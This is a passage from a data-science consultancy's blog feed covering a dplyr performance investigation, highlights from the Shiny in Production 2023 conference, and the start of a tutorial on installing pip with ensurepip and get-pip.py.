&lt;li&gt;NEWS files included with packages&lt;/li&gt;
&lt;li&gt;Changes in functions included as part of the package&lt;/li&gt;
&lt;li&gt;Arguments which functions take&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Diffify was useful in this case! Had we downgraded &lt;code&gt;{dplyr}&lt;/code&gt;, we would have removed recent performance improvements in other dplyr functions. A particular example to note is the &lt;code&gt;case_when()&lt;/code&gt; function. In version 1.1.0, this function would be significantly slower, an important fact to note given that the client was moving across to using &lt;code&gt;case_when()&lt;/code&gt; as an alternative to using &lt;code&gt;rowwise()&lt;/code&gt;, which is being deprecated. Downgrading to version 1.1.0 would have had the result of not allowing us to access these improvements.&lt;/p&gt;
&lt;p&gt;The release notes said:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Fixed a major performance regression in case_when(). It is still a little slower than in dplyr 1.0.10, but we plan to improve this further in the future (#6674).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, perhaps the client’s current approach of using &lt;code&gt;rowwise()&lt;/code&gt; and future approach of using &lt;code&gt;case_when()&lt;/code&gt; would both perform well on v1.0.10. But this has to be tested.&lt;/p&gt;
&lt;img src="diffify-screenshot.png" alt="Screenshot of Diffify showing the News updates comparing dplyr version 1.1.1 with 1.0.10." style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h3 id="final-recommendation-we-made-to-client"&gt;Final recommendation we made to client&lt;/h3&gt;
&lt;p&gt;For this particular function, &lt;code&gt;rowwise()&lt;/code&gt;, it turns out the key determinant of performance is the version of the &lt;code&gt;{dplyr}&lt;/code&gt; package being used. Although downgrading the version would solve this particular problem, it’s important to make sure that doing so doesn’t affect other functions under active development, such as &lt;code&gt;case_when()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In fact, the functions used in the client’s previous approach were moving to a suspended development stage. In this case, downgrading would have solved a problem that would soon no longer exist, and introduce a new problem for the code migrated to the better supported &lt;code&gt;case_when()&lt;/code&gt; function.&lt;/p&gt;
&lt;h3 id="summary"&gt;Summary&lt;/h3&gt;
&lt;p&gt;Here we see some extra support we provided our client for a problem we hadn’t anticipated at the beginning of our project. Sometimes the issue appears to be in one place, but further investigation reveals it’s in another. We are glad we have a good relationship with our client, who mentioned the slowdown to us, allowing us to get to problem solving.&lt;/p&gt;
&lt;h3 id="how-can-we-help"&gt;How can we help?&lt;/h3&gt;
&lt;p&gt;If you are looking for a data science platform, or require support maintaining your existing set-up, &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;get in touch&lt;/a&gt;! As &lt;a href="https://www.jumpingrivers.com/posit/" rel="external"&gt;Full Service Certified Posit Partners&lt;/a&gt;, we are trusted by &lt;a href="https://posit.co/certified-partners/" rel="external"&gt;Posit&lt;/a&gt; to provide installation, support and maintenance services on their products, as well as resell Posit licenses at no extra cost, but with great deals on our services.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/dplyr-debugging-posit-diffify/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Highlights from Shiny in Production (2023)</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/</link><pubDate>Thu, 19 Oct 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Following on from the success of &lt;a href="https://www.jumpingrivers.com/blog/shiny-in-production-highlights/" rel="external"&gt;Shiny in Production 2022&lt;/a&gt;, last week we were delighted to host the conference for the second time. The event took place at the Catalyst in Newcastle and featured two days of workshops and talks spanning all things Shiny!&lt;/p&gt;
&lt;p&gt;On day one, we held three interactive workshops:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Introduction to Shiny for Python&lt;/strong&gt; - Our guest speaker, Andrie de Vries from Posit, ran a workshop introducing the Python implementation of Shiny. Andrie covered the basic building blocks of a Shiny application in Python through a nice mix of presentations and hands-on exercises.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Building Responsive Shiny Applications&lt;/strong&gt; - Our JR data scientist and trainer, Keith Newman, ran a workshop looking at how to build responsive Shiny applications. Keith covered responsive design principles and best practices as well as some CSS tricks for when built-in solutions don&amp;rsquo;t quite cut it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Shiny Testing&lt;/strong&gt; - Russ Hyde, another JR data scientist and trainer, ran a workshop on automated testing for production-grade Shiny apps. Russ demonstrated how to utilise {&lt;a href="https://rstudio.github.io/shinytest2/" rel="external"&gt;shinytest2&lt;/a&gt;}, {&lt;a href="https://rdrr.io/github/rstudio/shiny/man/testServer.html" rel="external"&gt;testServer&lt;/a&gt;} and {&lt;a href="https://testthat.r-lib.org/" rel="external"&gt;testthat&lt;/a&gt;} to make app development a happier and more predictable experience.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you&amp;rsquo;re keen to learn more about Shiny and other web frameworks (or something else entirely!) check out our full list of available &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;training courses&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-in-production-highlights"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;&lt;img alt="Photo of all speakers" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/everyone.jpg" width="800"&gt;&lt;/p&gt;
&lt;p&gt;Day two featured a series of talks by prominent Shiny experts from across a range of industries:&lt;/p&gt;
&lt;h4 id="keynote-george-stagg-posit"&gt;Keynote: &lt;a href="https://twitter.com/gwstagg" rel="external"&gt;George Stagg&lt;/a&gt; (Posit)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Shiny Without a Server: webR and Shinylive&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Our opening keynote was given by George Stagg, a senior software engineer at Posit. George began by providing some motivation for webR and Shinylive, which allow users to run R and Shiny code in the web browser without the need for an expensive server. WebR supports graphics, presentation slides with Quarto, and interactive code in the browser. George went on to emphasise three main use-cases for Shinylive:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Building apps in the browser and sharing with colleagues&lt;/li&gt;
&lt;li&gt;Migrating an existing Shiny app to Shinylive using the {shinylive} package&lt;/li&gt;
&lt;li&gt;Embedding Shiny apps in presentation slides using the Quarto extension to Shinylive&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Before finishing, George noted that Shinylive is still experimental and should not be used for hosting apps that contain hardcoded secrets and passwords.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://georgestagg.github.io/shiny-without-a-server-2023/" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h4 id="liam-kalita-jumping-rivers"&gt;Liam Kalita (Jumping Rivers)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;The Road to Easier Shiny App Deployments&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Liam spoke about his experiences assisting clients with bringing their apps to production. He outlined some of the most common reasons that an app can fail at deployment, including missing dependencies, incorrect credentials for external databases, and insufficient system resources. He then shared some top tips to be more proactive:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Add &lt;strong&gt;continuous integration / continuous deployment (CI/CD)&lt;/strong&gt; checks that have to pass before deployment can happen&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Containerise&lt;/strong&gt; the app using tools like Docker to create a portable environment that can be used across different machines&lt;/li&gt;
&lt;li&gt;Use &lt;strong&gt;monitoring and alerting&lt;/strong&gt; to track demand and performance&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Liam finished by emphasising the importance of deployment logs and avoiding hardcoded secrets.&lt;/p&gt;
&lt;h4 id="chris-brownlie-barnett-waddingham"&gt;&lt;a href="https://twitter.com/cbrownlie_r" rel="external"&gt;Chris Brownlie&lt;/a&gt; (Barnett Waddingham)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Anatomy of a Shiny app&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Chris took us on a tour of the building blocks of {shiny} to explore what really goes on under the hood of a Shiny app. We learnt about the responsibilities of some of the main components used in Shiny, such as &lt;code&gt;ShinySession&lt;/code&gt;, &lt;code&gt;ReactiveEnvironment&lt;/code&gt; &amp;amp; &lt;code&gt;ReactiveVal&lt;/code&gt; and how they fit together. Chris showed us how “de-magic-ifying” Shiny can help us to improve our app design and avoid common pitfalls, as well as aid beginners learning Shiny. The talk wrapped up with some very relatable comments Chris found whilst digging through the source code, showing that even developers of large tools such as Shiny sometimes have to resort to a “copy/paste job” “:sob:”.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://chrisbrownlie.github.io/anatomy_of_shiny_sip23" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h4 id="naomi-bradbury-clareece-nevill-and-janion-nevill-university-of-leicester"&gt;&lt;a href="https://twitter.com/NIHRCRSU" rel="external"&gt;Naomi Bradbury, Clareece Nevill and Janion Nevill&lt;/a&gt; (University of Leicester)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Health Data Scientists Developing Production Grade Shiny Apps&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Naomi, Clareece and Janion told us the story of how they unexpectedly became developers of a suite of Shiny apps for healthcare researchers. They started out with a couple of simple proof-of-concept apps created as part of a mini project. However, as more researchers realised how useful their apps were, they started getting emails with queries, issues and even feature requests. That’s when they realised they had inadvertently become software developers and maintainers. We heard about the lessons they learnt along the journey, including how valuable it is to include software engineering expertise early on when developing apps, and that prototypes can always become production.&lt;/p&gt;
&lt;h4 id="colin-gillespie-jumping-rivers"&gt;&lt;a href="https://twitter.com/csgillespie" rel="external"&gt;Colin Gillespie&lt;/a&gt; (Jumping Rivers)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Securing Shiny Dashboards&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Colin started by covering common security pitfalls in Shiny apps, such as SQL injection attacks and hard-coded secrets committed to a repository, comically pointing out some of the things you can actually find on GitHub. He introduced our Shiny Health Check service, where we will assess your app and help improve aspects like security, code structure and version control workflows. Colin finished his talk with various policies that can be implemented to improve general web security.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://docs.google.com/presentation/d/1mOnNgSe20fadNRhEU87wsF7dD_mmWndgCm3fXd1AlYA/edit?usp=sharing" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h4 id="tan-ho-zelus-analytics"&gt;&lt;a href="https://twitter.com/_TanHo" rel="external"&gt;Tan Ho&lt;/a&gt; (Zelus Analytics)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Effective Logging for Shiny&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Tan spoke about his troubles with logs being difficult to find and not necessarily useful, and his subsequent journey to find a better solution. He went into the philosophy of logging and why humans and machines need different kinds of logs, breaking it down to the most basic question: “What are we trying to find out from the logs?”. Tan also covered the options for logging at package level versus logging in production Shiny apps.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://tanho.ca/logging-shiny" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h4 id="anna-skrzydło-appsilon"&gt;&lt;a href="https://www.linkedin.com/in/anna-skrzydlo/" rel="external"&gt;Anna Skrzydło&lt;/a&gt; (Appsilon)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;3 reasons why nobody uses your app&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Anna Skrzydło gave a relatable story of &amp;ldquo;Three reasons why users don&amp;rsquo;t use your app&amp;rdquo;. Spoiler alert: the main reasons are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;They don&amp;rsquo;t think they need your app&lt;/li&gt;
&lt;li&gt;They can&amp;rsquo;t use the app&lt;/li&gt;
&lt;li&gt;They don&amp;rsquo;t trust the app&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;When users don&amp;rsquo;t think they need your app, it&amp;rsquo;s possible you haven&amp;rsquo;t solved their problem. Anna suggested using user interviews, prototyping and user personas to identify the core of the problem. If the user is struggling to use the app correctly, you can use &lt;a href="https://www.nngroup.com/articles/ten-usability-heuristics/" rel="external"&gt;usability heuristics&lt;/a&gt; to improve the user experience, rather than just offering training. Finally, if the user doesn&amp;rsquo;t trust your app, fix bugs quickly and communicate clearly when changes are coming, giving users time to prepare.&lt;/p&gt;
&lt;h4 id="keynote-cara-thompson-freelance-data-consultant"&gt;Keynote: &lt;a href="https://twitter.com/cararthompson" rel="external"&gt;Cara Thompson&lt;/a&gt; (Freelance Data Consultant)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Dynamic annotations: tips and tricks to make text shine without stealing the show&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Our closing keynote was from data visualisation expert &lt;a href="https://www.cararthompson.com/" rel="external"&gt;Cara Thompson&lt;/a&gt;. Cara gave us a whirlwind tour of detailed plot styling and taught us how to decrease reliance on text through a worked example using the Great British Bake Off data set. We had plenty of &amp;ldquo;Aha&amp;rdquo; moments watching the plot evolve from a plain {ggplot2} graphic to something that told a real story. Key takeaways were to write the text in the order you speak it, and use text hierarchy to present your story in an organised way. You can read all of Cara&amp;rsquo;s &lt;a href="https://www.cararthompson.com/talks" rel="external"&gt;top tips in her slides&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://www.cararthompson.com/talks/shiny-dynamic-annotations/" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3 id="what-happens-next"&gt;What happens next?&lt;/h3&gt;
&lt;p&gt;We want to say thank you to the sponsors of the event for your support in making it possible!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rss.org.uk/" rel="external"&gt;Royal Statistical Society&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;NU Solve&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Thanks also to our speakers for their incredibly insightful presentations and workshops, and of course to all our attendees who travelled from near and far to make Shiny in Production such a memorable event! The talk recordings will be released on our &lt;a href="https://youtube.com/@jumping-rivers?si=Cwfi0bgbgFJaXnbq" rel="external"&gt;YouTube channel&lt;/a&gt; in the coming weeks, so keep your eyes peeled for that!&lt;/p&gt;
&lt;p&gt;We had such a great time running the Shiny in Production conference, that we&amp;rsquo;re planning on doing it all again next year! Shiny in Production 2024 will be taking place on 9th &amp;amp; 10th October 2024 - &lt;a href="https://www.eventbrite.co.uk/e/shiny-in-production-2024-registration-736359209217?aff=oddtdtcreator" rel="external"&gt;Super Early Bird tickets are available now&lt;/a&gt; - Look out for more details coming soon!&lt;/p&gt;
&lt;p&gt;Can&amp;rsquo;t wait that long? We&amp;rsquo;ll be hosting SatRdays London 2024 on April 27th, in collaboration with &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt;. More details will be announced in an upcoming blog!&lt;/p&gt;
&lt;h4 id="gold-sponsor"&gt;Gold sponsor&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://www.nicd.org.uk/"&gt;&lt;img src="nicd_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NICD logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4 id="silver-sponsor-with-drinks-reception"&gt;Silver sponsor with drinks reception&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://rss.org.uk/"&gt;&lt;img src="rss_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em" alt="RSS logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4 id="silver-sponsors"&gt;Silver Sponsors&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/"&gt;&lt;img src="nu-solve_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-bottom: 3em" alt="NU Solve logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://posit.co/"&gt;&lt;img src="posit-logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-bottom: 3em" alt="Posit logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.r-consortium.org/"&gt;&lt;img src="rconsortium-logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="R Consortium logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>An Introduction to Python Package Managers</title><link>https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/</link><pubDate>Thu, 05 Oct 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Python is a general-purpose, high-level language which, thanks to its simplicity and versatility, has become very popular, especially within the data science community. The extensive Python community has developed and contributed thousands of libraries and packages over the years in a plethora of different disciplines to aid developers with their applications. Managing these packages can be a challenging task without the correct tools. That&amp;rsquo;s where Python package managers come in. In this blog post we will explore what a package manager is and why they are important. We will then cover some popular examples, including how to install them, how to use them and the pros and cons of each.&lt;/p&gt;
&lt;p&gt;Whilst we will briefly touch on virtual environments in places, we will explore these in more depth in an upcoming post.&lt;/p&gt;
&lt;h3 id="what-is-a-python-package-manager"&gt;What is a Python Package Manager?&lt;/h3&gt;
&lt;p&gt;Python package managers are essential tools that help developers install, manage, and update external libraries or packages used in Python projects. These packages can contain reusable code, modules, and functions developed by other programmers, making it easier for developers to build applications without reinventing the wheel. Package managers automate the process of fetching, installing, and handling dependencies, streamlining the workflow and ensuring a smooth development experience.&lt;/p&gt;
&lt;h4 id="managing-package-dependencies"&gt;Managing Package Dependencies&lt;/h4&gt;
&lt;p&gt;One of the key challenges in software development is dealing with dependencies — the external libraries and packages that your project relies on. Python package managers help alleviate this challenge by managing dependencies automatically. When you install a package, the package manager will also fetch and install any dependencies required by that package, recursively handling all transitive dependencies whilst making sure all package versions integrate with each other.&lt;/p&gt;
&lt;p&gt;Additionally, package managers provide support for creating virtual environments. Virtual environments enable developers to create isolated and self-contained environments for each project, ensuring that the dependencies installed for one project do not interfere with another.&lt;/p&gt;
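&lt;p&gt;As a minimal sketch of that isolation, assuming Python 3 is available as &lt;code&gt;python3&lt;/code&gt; on macOS or Linux, the standard library &lt;code&gt;venv&lt;/code&gt; module can create an environment in a directory of your choosing (&lt;code&gt;.venv&lt;/code&gt; here is only an illustrative name):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Create an isolated environment in a directory called .venv (illustrative name)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python3 -m venv .venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Activate it for the current shell session
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;. .venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# The pip reported here should now live inside .venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m pip --version
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;On Windows the activation scripts live in &lt;code&gt;.venv\Scripts&lt;/code&gt; instead. Running &lt;code&gt;deactivate&lt;/code&gt; returns the shell to the system-wide Python.&lt;/p&gt;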
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-python-package-managers-pip-conda-poetry"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="popular-python-package-managers"&gt;Popular Python Package Managers&lt;/h3&gt;
&lt;p&gt;There are many different Python package managers out there. Attempting to write about all of these would lead to an almost never-ending blog post and no one would want to read that! Instead, we will talk about some of the most popular options that a lot of Python developers use: pip, conda and poetry. Each has its advantages and disadvantages, which we will talk through below.&lt;/p&gt;
&lt;h4 id="pip"&gt;pip&lt;/h4&gt;
&lt;p&gt;The most widely used Python package manager is &lt;a href="https://pypi.org/project/pip/" rel="external"&gt;pip&lt;/a&gt; (short for &amp;ldquo;pip installs packages&amp;rdquo;). It comes pre-installed with Python versions 3.4 and later. Pip allows developers to easily install packages from the &lt;a href="https://pypi.org/" rel="external"&gt;Python Package Index&lt;/a&gt; (PyPI) and other repositories. It also handles package versioning, so you can install specific versions of packages when needed.&lt;/p&gt;
&lt;h5 id="how-to-install-pip"&gt;How to Install pip&lt;/h5&gt;
&lt;p&gt;Typically, pip is installed by default alongside Python. If this is not the case, there are two ways to install pip:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ensurepip&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get-pip.py&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="ensurepip"&gt;&lt;code&gt;ensurepip&lt;/code&gt;&lt;/h4&gt;
&lt;p&gt;The &lt;code&gt;ensurepip&lt;/code&gt; module has been part of the Python standard library since Python 3.4. You can filter the instructions below to your preferred OS by clicking the corresponding tab:&lt;/p&gt;
&lt;div class="tab"&gt;
&lt;button class="tablinks" onclick="openOS(event, 'ensurepipWindows')"&gt;Windows&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'ensurepipMacOS')"&gt;macOS&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'ensurepipLinux')"&gt;Linux&lt;/button&gt;
&lt;/div&gt;
&lt;div id="ensurepipWindows" class="tabcontent"&gt;
&lt;h5&gt;Windows&lt;/h5&gt;
&lt;p&gt;
In your preferred terminal run:
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;py -m ensurepip --upgrade
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;div id="ensurepipMacOS" class="tabcontent"&gt;
&lt;h5&gt;macOS&lt;/h5&gt;
&lt;p&gt;
In your preferred terminal run:
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; python3 -m ensurepip --upgrade
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;div id="ensurepipLinux" class="tabcontent"&gt;
&lt;h5&gt;Linux&lt;/h5&gt;
&lt;p&gt;
In your preferred terminal run:
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; python3 -m ensurepip --upgrade
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;h5 id="get_pippy"&gt;&lt;code&gt;get-pip.py&lt;/code&gt;&lt;/h5&gt;
&lt;p&gt;An alternative way to install pip is by using the Python script &lt;code&gt;get-pip.py&lt;/code&gt;.&lt;/p&gt;
&lt;div class="tab"&gt;
&lt;button class="tablinks" onclick="openOS(event, 'pipWindows')"&gt;Windows&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'pipMacOS')"&gt;macOS&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'pipLinux')"&gt;Linux&lt;/button&gt;
&lt;/div&gt;
&lt;div id="pipWindows" class="tabcontent"&gt;
&lt;h5&gt;Windows&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Firstly, download &lt;code&gt;get-pip.py&lt;/code&gt; by visiting &lt;a href="https://bootstrap.pypa.io/get-pip.py" rel="external"&gt;bootstrap.pypa.io/get-pip.py&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Open the Command Prompt, navigate to the directory where you have downloaded &lt;code&gt;get-pip.py&lt;/code&gt; and then run:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; py get-pip.&lt;span style="color:#79c0ff"&gt;py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;div id="pipMacOS" class="tabcontent"&gt;
&lt;h5&gt;macOS&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Open your preferred terminal&lt;/li&gt;
&lt;li&gt;Download &lt;code&gt;get-pip.py&lt;/code&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="3"&gt;
&lt;li&gt;Install pip by running:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; python3 get-pip.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div id="pipLinux" class="tabcontent"&gt;
&lt;h5&gt;Linux&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Open your preferred terminal&lt;/li&gt;
&lt;li&gt;Download &lt;code&gt;get-pip.py&lt;/code&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; wget https://bootstrap.pypa.io/get-pip.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="3"&gt;
&lt;li&gt;Install pip by running:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; python3 get-pip.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/p&gt;
&lt;/div&gt;
